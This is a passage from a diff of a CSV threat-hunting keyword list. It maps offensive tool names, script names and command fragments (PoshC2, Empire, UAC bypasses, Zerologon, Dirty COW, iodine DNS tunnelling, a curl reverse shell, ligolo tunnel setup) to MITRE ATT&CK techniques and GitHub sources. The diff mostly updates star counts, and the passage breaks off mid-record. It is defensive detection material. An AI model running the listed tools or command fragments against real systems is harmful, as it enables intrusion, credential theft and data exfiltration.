PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-WmiCommand*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*invoke-wmiexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-wmiexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-WMIExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-WMIExec*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*invoke-wmijspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*invoke-wmipayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 
- T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-wmijspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-wmipayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-WmiShadowCopy*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - 
T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" -"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-WscriptElevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 
Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WscriptElevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ZeroLogon*","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - 
T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","3","203","46","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z" -"*Invoke-Zerologon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoking CreateSvcRpc (by @x86matthew*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*Invoke-Zerologon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoking CreateSvcRpc (by @x86matthew*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*io_dirtycow.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*io_dirtycow.so*","offensive_tool_keyword","POC","POC exploitation for dirtycow 
vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*iodine -*","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -12460,43 +12616,43 @@ "*iomoath/PowerShx*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*ionide *","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ionided *","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ios7tojohn.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ios7tojohn.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*ip link set ligolo up*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ip link set ligolo up*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for 
establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ip route add * dev ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ip tuntap add user root mode tun ligolo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*IPeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*IPfuscation.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
-"*IPfuscation.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*IPfuscation.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*IPfuscation.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*iptables -t nat -A REDSOCKS*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - 
T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*IReversePortForwardService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*irkjanm/krbrelayx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*irs.exe -*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irs.exe exec*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of 
Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*irsl/curlshell*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*is_kirbi_file*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*irs.exe -*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe exec*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM 